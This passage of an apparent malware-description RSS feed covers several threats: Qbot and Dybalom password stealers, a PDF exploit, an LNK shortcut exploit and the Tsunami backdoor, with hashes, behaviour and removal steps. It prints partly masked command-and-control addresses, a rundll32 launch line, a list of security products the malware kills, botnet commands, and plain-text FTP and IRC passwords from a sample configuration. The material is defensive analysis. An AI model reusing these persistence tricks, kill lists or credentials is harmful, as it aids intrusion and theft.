&lt;pre&gt;
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Runonce]
&lt;/pre&gt;
&lt;p&gt;3. Delete files:
&lt;/p&gt;
&lt;pre&gt;
%ALLUSERSPROFILE%\Application Data\Microsoft\&amp;lt;rnd_1&amp;gt;\&amp;lt;rnd_1&amp;gt;.exe
%ALLUSERSPROFILE%\Application Data\Microsoft\&amp;lt;rnd_1&amp;gt;\&amp;lt;rnd_1&amp;gt;.dll 
%ALLUSERSPROFILE%\Application Data\Microsoft\&amp;lt;rnd_1&amp;gt;\&amp;lt;rnd_3&amp;gt;.dll
%ALLUSERSPROFILE%\Application Data\Microsoft\&amp;lt;rnd_1&amp;gt;\&amp;lt;rnd_4&amp;gt;.dll
c:\irclog.txt
&lt;/pre&gt;
&lt;p&gt;4. Delete downloaded files in the folder:
&lt;/p&gt;
&lt;pre&gt;%WinDir%\TEMP
&lt;/pre&gt;
&lt;p&gt;5. Clear the Temporary Internet Files directory, which may contain infected files.
&lt;/p&gt;&lt;p&gt;6. Change the authentication data for the compromised resources.
&lt;/p&gt;&lt;p&gt;7. Perform a full system scan with an antivirus with updated databases.
&lt;/p&gt;
&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;&lt;b&gt;Can't find a description for a specific malware?&lt;/b&gt;&lt;br /&gt;
You can &lt;a href="http://www.dnt-lab.com/en/services"&gt;order a description for any computer malware, virus, trojan or worm&lt;/a&gt;.&lt;/div&gt;
</description>
			<pubDate>Sat, 21 May 2011 23:33:02 +0300</pubDate>
			<author>Playrhyba</author>
			<guid>http://www.totalmalwareinfo.com/eng/Trojan-PSW.Win32.Qbot.dkg</guid>
		</item>
		<item>
			<title>Trojan-PSW.Win32.Dybalom.ggk</title>
			<link>http://www.totalmalwareinfo.com/eng/Trojan-PSW.Win32.Dybalom.ggk</link>
			<description>&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;The description for &lt;b&gt;NewsChannel&lt;/b&gt; was created during beta-test of&amp;nbsp;&amp;laquo;Malware description on&amp;nbsp;demand&amp;raquo; service. Learn more about&amp;nbsp;at: &lt;a href="http://www.dnt-lab.com/en/services"&gt;&lt;nobr&gt;www.dnt-lab.com/en/services&lt;/nobr&gt;&lt;/a&gt;.&lt;/div&gt;
&lt;div style="float: right; margin-left: 10px; margin-bottom: 5px;"&gt;
&lt;table style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;tr style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;td colspan="2" style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px; background-color: #f8f8f8;"&gt;
&lt;div align="center"&gt;&lt;b&gt;NewsChannel&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;Last edited:
&lt;/p&gt;
&lt;/td&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;26.5.2012
&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;The trojan belongs to the family that steals user passwords. It is a Windows application (PE EXE-file).  Its size is 348,360 bytes. It is packed using MoleBox. Its unpacked size is about 368 KB. It is written in C++.
&lt;/p&gt;&lt;p&gt;MD5: 1CF38EA970C8EBDCA48DB1B349CF234B
&lt;/p&gt;&lt;p&gt;SHA1: B4B8E60112516B6886994E4D0DFD45D3659619FF
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Payload"&gt;Payload&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;Once launched, the trojan reads a configuration file from resources. Then, accordingly to the read settings, it performs actions shown below.
&lt;/p&gt;&lt;p&gt;The trojan has anti-debugging and anti-dynamic analysis protection. The trojan exits if windows with the following classes are observed:
&lt;/p&gt;
&lt;pre&gt;
PROCMON_WINDOW_CLASS
gdkWindowToplevel
&lt;/pre&gt;
&lt;p&gt;The trojan steals personal data and account information of the following applications and services:
&lt;/p&gt;
&lt;pre&gt;
Microsoft Passport.Net
Google Talk
Trillian
Pidgin
Paltalk
Steam Valve
No-Ip Duc
DynDNS
Mozilla Firefox
Internet Explorer 7/8
Google Chrome
Opera
Internet Download Manager
FileZilla
FlashFXP
SmartFTP
CuteFTP Lite
CuteFTP Home
CuteFTP Pro
&lt;/pre&gt;
&lt;p&gt;The trojan sends stolen data to the following URL:
&lt;/p&gt;
&lt;pre&gt;
http://www.ma****kings.com
&lt;/pre&gt;
&lt;p&gt;At the moment of writing, the link didn’t work.
&lt;/p&gt;&lt;p&gt;After this, the trojan terminates.
&lt;/p&gt;&lt;p&gt;Also, the trojan creates the file:
&lt;/p&gt;
&lt;pre&gt;%WorkDir%\&amp;lt;trojan-filename&amp;gt;-up.txt
&lt;/pre&gt;
&lt;p&gt;It contains a log file produced by the program protecting the trojan.
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Removal_Instructions"&gt;Removal Instructions&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;If your computer was not protected by an antivirus and was infected with this malware, follow these steps to remove it:
&lt;/p&gt;&lt;p&gt;1. Delete the original trojan file (its location on the infected computer will depend on how the program originally penetrated the victim machine).
&lt;/p&gt;&lt;p&gt;2. Delete the file:
&lt;/p&gt;
&lt;pre&gt;%WorkDir%\&amp;lt;trojan-filename&amp;gt;-up.txt
&lt;/pre&gt;
&lt;p&gt;3. Change password for compromised accounts.
&lt;/p&gt;&lt;p&gt;4. Perform a full system scan with an antivirus with updated databases.
&lt;/p&gt;
&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;&lt;b&gt;Can't find a description for a specific malware?&lt;/b&gt;&lt;br /&gt;
You can &lt;a href="http://www.dnt-lab.com/en/services"&gt;order a description for any computer malware, virus, trojan or worm&lt;/a&gt;.&lt;/div&gt;
</description>
			<pubDate>Sat, 14 May 2011 22:02:57 +0300</pubDate>
			<author>Playrhyba</author>
			<guid>http://www.totalmalwareinfo.com/eng/Trojan-PSW.Win32.Dybalom.ggk</guid>
		</item>
		<item>
			<title>Exploit.JS.Pdfka.dna</title>
			<link>http://www.totalmalwareinfo.com/eng/Exploit.JS.Pdfka.dna</link>
			<description>&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;The description for &lt;b&gt;NewsChannel&lt;/b&gt; was created during beta-test of&amp;nbsp;&amp;laquo;Malware description on&amp;nbsp;demand&amp;raquo; service. Learn more about&amp;nbsp;at: &lt;a href="http://www.dnt-lab.com/en/services"&gt;&lt;nobr&gt;www.dnt-lab.com/en/services&lt;/nobr&gt;&lt;/a&gt;.&lt;/div&gt;
&lt;div style="float: right; margin-left: 10px; margin-bottom: 5px;"&gt;
&lt;table style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;tr style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;td colspan="2" style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px; background-color: #f8f8f8;"&gt;
&lt;div align="center"&gt;&lt;b&gt;NewsChannel&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;Last edited:
&lt;/p&gt;
&lt;/td&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;26.5.2012
&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;This exploit program uses vulnerabilities in Adobe Reader and Acrobat to execute itself on the user's computer. It is a PDF document containing XML Forms Architecture and Java Script. It is 26,393 bytes in size.
&lt;/p&gt;&lt;p&gt;MD5: 66A58A3AAF2F7AAECA3D95AB86E0BA28
&lt;/p&gt;&lt;p&gt;SHA1: 008112C3EE4F6FD21433027C7A3E4E9543B3BB46
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Payload"&gt;Payload&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;Initialization and execution of the malicious payload is done on opening of an infected PDF document containing an XFA form. An obfuscated malicious Java Script is used as a handler of the “initialize” event in the XFA form. After removing of obfuscation, the malicious script exploits the &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188" class="external text"&gt;CVE-2010-0188&lt;/a&gt; vulnerability in Adobe Reader with a purpose to download the following file:
&lt;/p&gt;
&lt;pre&gt;
http://fi****ld.info/1TF19pd
&lt;/pre&gt;
&lt;p&gt;This file is stored in the following location:
&lt;/p&gt;
&lt;pre&gt;%Temp%\&amp;lt;rnd&amp;gt;.exe
&lt;/pre&gt;
&lt;p&gt;here &amp;lt;rnd&amp;gt; – random Latin characters.
&lt;/p&gt;&lt;p&gt;The malware then launches the downloaded file for execution. At the time of writing, these links were inactive. Adobe Reader and Acrobat 8 (up to version 8.2.1) and 9 (up to 9.3.1) are vulnerable to this exploit.
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Removal_Instructions"&gt;Removal Instructions&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;If your computer does not have an antivirus, and is infected by this malicious program, follow the instructions below to delete it:
&lt;/p&gt;&lt;p&gt;1. Delete the original exploit file (its location will depend on how the program originally penetrated the infected computer).
&lt;/p&gt;&lt;p&gt;2. Delete the downloaded malicious file: 
&lt;/p&gt;
&lt;pre&gt;%Temp%\&amp;lt;rnd&amp;gt;.exe
&lt;/pre&gt;
&lt;p&gt;3. Update Adobe Reader and Acrobat or install updates using the link:
&lt;/p&gt;
&lt;pre&gt;&lt;a href="http://www.adobe.com/support/security/bulletins/apsb10-07.html" class="external free"&gt;http://www.adobe.com/support/security/bulletins/apsb10-07.html&lt;/a&gt;
&lt;/pre&gt;
&lt;p&gt;4. Perform a full system scan with an antivirus with updated databases.
&lt;/p&gt;
&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;&lt;b&gt;Can't find a description for a specific malware?&lt;/b&gt;&lt;br /&gt;
You can &lt;a href="http://www.dnt-lab.com/en/services"&gt;order a description for any computer malware, virus, trojan or worm&lt;/a&gt;.&lt;/div&gt;
</description>
			<pubDate>Sat, 07 May 2011 14:30:11 +0300</pubDate>
			<author>Playrhyba</author>
			<guid>http://www.totalmalwareinfo.com/eng/Exploit.JS.Pdfka.dna</guid>
		</item>
		<item>
			<title>Exploit.Win32.CVE-2010-2568.z</title>
			<link>http://www.totalmalwareinfo.com/eng/Exploit.Win32.CVE-2010-2568.z</link>
			<description>&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;The description for &lt;b&gt;NewsChannel&lt;/b&gt; was created during beta-test of&amp;nbsp;&amp;laquo;Malware description on&amp;nbsp;demand&amp;raquo; service. Learn more about&amp;nbsp;at: &lt;a href="http://www.dnt-lab.com/en/services"&gt;&lt;nobr&gt;www.dnt-lab.com/en/services&lt;/nobr&gt;&lt;/a&gt;.&lt;/div&gt;
&lt;div style="float: right; margin-left: 10px; margin-bottom: 5px;"&gt;
&lt;table style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;tr style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;td colspan="2" style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px; background-color: #f8f8f8;"&gt;
&lt;div align="center"&gt;&lt;b&gt;NewsChannel&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;Last edited:
&lt;/p&gt;
&lt;/td&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;26.5.2012
&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;The exploit is designed to automatically launch other programs from USB-drives. It is a Windows shortcut (LNK-file). Its size is 461 bytes.
&lt;/p&gt;&lt;p&gt;MD5: 0FCD30C5093D798917AEE203263ED2DB
&lt;/p&gt;&lt;p&gt;SHA1: ABDAD79CA98697CFC1E2BDF8FD8C23F205080C30
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Payload"&gt;Payload&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;Once launched, the exploit uses the vulnerability &lt;a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2568" class="external text"&gt;CVE-2010-2568&lt;/a&gt; in "shell32.dll". This vulnerability allows local users or remote attackers to execute arbitrary code via a crafted .LNK or .PIF shortcut file, which is not properly handled during icon display in Windows Explorer.
&lt;/p&gt;&lt;p&gt;When a user opens an infected USB-drive by using the Windows Explorer, the following command line will be launched:
&lt;/p&gt;
&lt;pre&gt;C:\Windows\system32\rundll32.exe setup50045.fon,6279f92e
&lt;/pre&gt;
&lt;p&gt;Thus, the function "6279f92e" will be called from DLL "setup50045.fon" using the system utility "rundll32.exe".
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Removal_Instructions"&gt;Removal Instructions&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;If your computer was not protected by an antivirus and was infected with this malware, follow these steps to remove it:
&lt;/p&gt;&lt;p&gt;1. Delete the original malicious file (the location on the infected computer will depend on how the program originally penetrated the victim machine).
&lt;/p&gt;&lt;p&gt;2.  Perform a full system scan with an antivirus with updated databases.
&lt;/p&gt;
&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;&lt;b&gt;Can't find a description for a specific malware?&lt;/b&gt;&lt;br /&gt;
You can &lt;a href="http://www.dnt-lab.com/en/services"&gt;order a description for any computer malware, virus, trojan or worm&lt;/a&gt;.&lt;/div&gt;
</description>
			<pubDate>Sat, 30 Apr 2011 23:21:22 +0300</pubDate>
			<author>Playrhyba</author>
			<guid>http://www.totalmalwareinfo.com/eng/Exploit.Win32.CVE-2010-2568.z</guid>
		</item>
		<item>
			<title>Backdoor.Linux.Tsunami.gen</title>
			<link>http://www.totalmalwareinfo.com/eng/Backdoor.Linux.Tsunami.gen</link>
			<description>&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;The description for &lt;b&gt;NewsChannel&lt;/b&gt; was created during beta-test of&amp;nbsp;&amp;laquo;Malware description on&amp;nbsp;demand&amp;raquo; service. Learn more about&amp;nbsp;at: &lt;a href="http://www.dnt-lab.com/en/services"&gt;&lt;nobr&gt;www.dnt-lab.com/en/services&lt;/nobr&gt;&lt;/a&gt;.&lt;/div&gt;
&lt;div style="float: right; margin-left: 10px; margin-bottom: 5px;"&gt;
&lt;table style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;tr style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;td colspan="2" style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px; background-color: #f8f8f8;"&gt;
&lt;div align="center"&gt;&lt;b&gt;NewsChannel&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;Last edited:
&lt;/p&gt;
&lt;/td&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;26.5.2012
&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;The backdoor provides an attacker with a remote access to an infected machine. It is a Linux application (ELF-file). It is 29318 bytes in size.
&lt;/p&gt;&lt;p&gt;MD5: 1610768b1524e24d840ae25964d02c8e 
&lt;/p&gt;&lt;p&gt;SHA1: 8766ba34a15e56850feab896b37a987077b0d2a4 
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Payload"&gt;Payload&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;The backdoor provides networking with the following hosts:
&lt;/p&gt;
&lt;pre&gt;80.243.***.131
&lt;/pre&gt;
&lt;p&gt;In response, the backdoor receives next commands from an attacker:
&lt;/p&gt;
&lt;pre&gt;
TSUNAMI
UNKNOWN
NICK
SERVER
GETSPOOFS
SPOOFS
DISABLE
ENABLE
KILL
VERSION
KILLALL
HELP
IRC
SH
PAN
MOVE
UDP
GET
&lt;/pre&gt;
&lt;p&gt;Depending on command  backdoor can perform the following actions:
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; downloads files from the Internet to save them with the specified name and run (GET);
&lt;/li&gt;&lt;li&gt; executes shell commands (SH);
&lt;/li&gt;&lt;li&gt; communicates via HTTP and IRC channels (SERVER, NICK, IRC, VERSION, HELP, MOVE, KILL);
&lt;/li&gt;&lt;li&gt; organizes DDoS-attacks on the specified IP-address (TSUNAMI, GETSPOOFS, SPOOFS, DISABLE, ENABLE, PAN, UDP, KILLALL);
&lt;/li&gt;&lt;/ul&gt;
&lt;p&gt;Thus backdoor provides an attacker a full access to an infected computer, which becomes a part of a botnet.
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Removal_instructions"&gt;Removal instructions&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;If your computer does not have an antivirus, and is infected by this malicious program, follow the instructions below to delete it:
&lt;/p&gt;&lt;p&gt;1. Delete the original malicious file (the location on the infected computer will depend on how the program originally penetrated the victim machine).
&lt;/p&gt;&lt;p&gt;2. Perform a full system scan with an antivirus with updated databases.
&lt;/p&gt;
&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;&lt;b&gt;Can't find a description for a specific malware?&lt;/b&gt;&lt;br /&gt;
You can &lt;a href="http://www.dnt-lab.com/en/services"&gt;order a description for any computer malware, virus, trojan or worm&lt;/a&gt;.&lt;/div&gt;
</description>
			<pubDate>Sat, 23 Apr 2011 21:52:07 +0300</pubDate>
			<author>Playrhyba</author>
			<guid>http://www.totalmalwareinfo.com/eng/Backdoor.Linux.Tsunami.gen</guid>
		</item>
		<item>
			<title>Trojan-PSW.Win32.Qbot.byy</title>
			<link>http://www.totalmalwareinfo.com/eng/Trojan-PSW.Win32.Qbot.byy</link>
			<description>&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;The description for &lt;b&gt;NewsChannel&lt;/b&gt; was created during beta-test of&amp;nbsp;&amp;laquo;Malware description on&amp;nbsp;demand&amp;raquo; service. Learn more about&amp;nbsp;at: &lt;a href="http://www.dnt-lab.com/en/services"&gt;&lt;nobr&gt;www.dnt-lab.com/en/services&lt;/nobr&gt;&lt;/a&gt;.&lt;/div&gt;
&lt;div style="float: right; margin-left: 10px; margin-bottom: 5px;"&gt;
&lt;table style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;tr style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;td colspan="2" style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px; background-color: #f8f8f8;"&gt;
&lt;div align="center"&gt;&lt;b&gt;NewsChannel&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;Last edited:
&lt;/p&gt;
&lt;/td&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;26.5.2012
&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;It is a malicious program that provides an attacker with remote access to an infected machine.It is a Windows application (PE-EXE file). Its size is 249,344 bytes. It is packed by UPX. The unpacked file is about 279 KB. It is written in C++.
&lt;/p&gt;&lt;p&gt;MD5: 78415F430F79382AC9DD377B806C52BE
&lt;/p&gt;&lt;p&gt;SHA1: F6B1D472EAE28CE16A5C3D7DEDE92184CF8E1424
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Installation"&gt;Installation&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;Once launched, the backdoor copies its body to the file:
&lt;/p&gt;
&lt;pre&gt;%ALLUSERSPROFILE%\Application Data\Microsoft\&amp;lt;rnd_1&amp;gt;\&amp;lt;rnd_1&amp;gt;.exe
&lt;/pre&gt;
&lt;p&gt;where &amp;lt;rnd_1&amp;gt; - random name (for example: "uiouy").
&lt;/p&gt;&lt;p&gt;The backdoor appends a path to the created copy to a value of one of registry keys found in the following branch for the purpose of launching the created copy automatically each time the system starts:
&lt;/p&gt;
&lt;pre&gt;[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
&lt;/pre&gt;
&lt;p&gt;For example:
&lt;/p&gt;
&lt;pre&gt;
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
&amp;lt;Application name&amp;gt; = &amp;quot;&amp;quot;% ALLUSERSPROFILE%\Application Data\Microsoft\&amp;lt;rnd_1&amp;gt;\&amp;lt;rnd_1&amp;gt;.exe &amp;quot;/c &amp;lt;old value&amp;gt;
&lt;/pre&gt;
&lt;p&gt;It also creates a registry key:
&lt;/p&gt;
&lt;pre&gt;
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
&amp;quot;&amp;lt;rnd_2&amp;gt;&amp;quot; = &amp;quot;%ALLUSERSPROFILE%\Application Data\Microsoft\&amp;lt;rnd_1&amp;gt;\&amp;lt;rnd_1&amp;gt;.exe&amp;quot;
&lt;/pre&gt;
&lt;p&gt;where &amp;lt;rnd_2&amp;gt; - random name (for example: "jladjtrq").
&lt;/p&gt;&lt;p&gt;If the backdoor can't create keys in the aforementioned branch, these actions will be executed in the branches:
&lt;/p&gt;
&lt;pre&gt;
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Runonce]
&lt;/pre&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Payload"&gt;Payload&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;Once launched, the backdoor performs the following actions:
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; It creates a unique identifier with the following name to control uniqueness of its process:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;&amp;lt;the name of backdoor's executable&amp;gt;a&amp;lt;username&amp;gt;
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; It collects the following information about the system:
&lt;/li&gt;&lt;/ul&gt;
&lt;p&gt;- User name;
&lt;/p&gt;&lt;p&gt;- Computer name;
&lt;/p&gt;&lt;p&gt;- The serial number of the system drive;
&lt;/p&gt;&lt;p&gt;- The registry key value:
&lt;/p&gt;
&lt;pre&gt;
[HKLM\Software\Microsoft\Windows NT\CurrentVersion]
&amp;quot;ProductId&amp;quot;
&lt;/pre&gt;
&lt;p&gt;- A list of software installed on the infected computer. For this purpose, the backdoor reads values of ​​"ProductName" keys in the registry branch:
&lt;/p&gt;
&lt;pre&gt;[HKCR\Installer\Products]
&lt;/pre&gt;
&lt;p&gt;The collected information is sent to attacker's server.
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; It terminates processes and stops system services that contain the following substrings in the names:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
webroot.
agnitum
ahnlab
arcabit
avast
avg
avira
avp
bitdefender
bit9
castlecops
centralcommand
clamav
comodo
computerassociates
cpsecure
defender
drweb
emsisoft
esafe
. Eset
etrust
ewido
fortinet
f-prot
f-secure
gdata
grisoft
hacksoft
hauri
ikarus
jotti
k7computing
kaspersky
malware
mcafee
networkassociates
nod32
norman
norton
panda
pctools
prevx
quickheal
rising
rootkit
securecomputing
sophos
spamhaus
spyware
sunbelt
symantec
threatexpert
trendmicro
virus
wilderssecurity
windowsupdate
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; It terminates the following processes:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
msdev.exe
dbgview.exe
mirc.exe
ollydbg.exe
ctfmon.exe
&lt;/pre&gt;
&lt;ul&gt;&lt;li&gt; It extracts the files from its body, which are stored in the system under the following names:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;
%ALLUSERSPROFILE%\Application Data\Microsoft\&amp;lt;rnd_1&amp;gt;\&amp;lt;rnd_1&amp;gt;.dll (135,216 bytes; it is detected by Kaspersky Antivirus as &amp;quot;Trojan-PSW.Win32.Qbot.byx&amp;quot;)
 
%ALLUSERSPROFILE%\Application Data\Microsoft\&amp;lt;rnd_1&amp;gt;\&amp;lt;rnd_3&amp;gt;.dll
&lt;/pre&gt;
&lt;p&gt;where &amp;lt;rnd_3&amp;gt; - &amp;lt;rnd_1&amp;gt; name's first 4 characters.
&lt;/p&gt;&lt;p&gt;The file "&amp;lt;rnd_ 3&amp;gt;.dll" contains the encrypted information to configure the further malware's work. For instance this file can contain the following strings:
&lt;/p&gt;
&lt;pre&gt;
# Line begining with '#' is a comment
# '#' - Not in the begining - is not a comment!!!
# Irc_servers = master.madway.net
 
irc_ssl_server_port = 16668
irc_pass = Zrmausakl1829997
p2p_node_lst = http://bc***1.in/cgi-bin/ls1.pl
ftphost_1 = 77.221.***.75: agamain: qu5end8k: /. cpanel
ftphost_2 = ftp.acme****rmation.com: logs@acmeinformation.com: zubri51241:
ftphost_3 = ftp.hun***central.com: testuser@hunterscentral.com: kolbasa25:
ftphost_4 = s046.pane****manager.com: equipem1: 4Y2V64b0dy67: /. last
update_conf_ver = 861
&lt;/pre&gt;
&lt;p&gt;Once launched, the backdoor writes generated data, as well as some collected information to the configuration file. For example:
&lt;/p&gt;
&lt;pre&gt;
alias__qbot.cb = uiou.dll
alias__qbotinj.exe = uiouy.exe
alias__qbot.dll = uiouy.dll
alias_seclog.txt = uio.dll
alias_si.txt = larvsox
alias_ps_dump = oejtuy12n
alias_qa.bin == wcod
home_dir=c:\\documents and settings\\all users\\application data\\microsoft\\uiouy
irc_my_nick = vwnfjq298080
install_time = 20.46.28-9/04/2011
&lt;/pre&gt;
&lt;p&gt;This file is encrypted and sent to attacker's server.
&lt;/p&gt;
&lt;ul&gt;&lt;li&gt; It calls the function "kIlsasgcbag0a" from extracted DLL "&amp;lt;rnd_1&amp;gt;.dll". This function installs the hook procedure for monitoring messages in the system queue. It allows the malware to hide its working directory and track the user activity on the infected system (keystrokes, file access, network traffic, etc.). The obtained information is stored in the file:
&lt;/li&gt;&lt;/ul&gt;
&lt;pre&gt;% ALLUSERSPROFILE%\Application Data\Microsoft\&amp;lt;rnd_1&amp;gt;\&amp;lt;rnd_4&amp;gt;.dll
&lt;/pre&gt;
&lt;p&gt;where &amp;lt;rnd_4&amp;gt; - &amp;lt;rnd_1&amp;gt; name's first 3 characters.
&lt;/p&gt;&lt;p&gt;Below is an example of the log created by the malware during user authentication on the site "vk.com".
&lt;/p&gt;
&lt;pre&gt;
t=kb time=[23:49:55-9/4/2011] p=[Explorer.EXE] b=[iexplore]
t=kb time=[23:50:7-9/4/2011] p=[iexplore.exe] b=[vk]
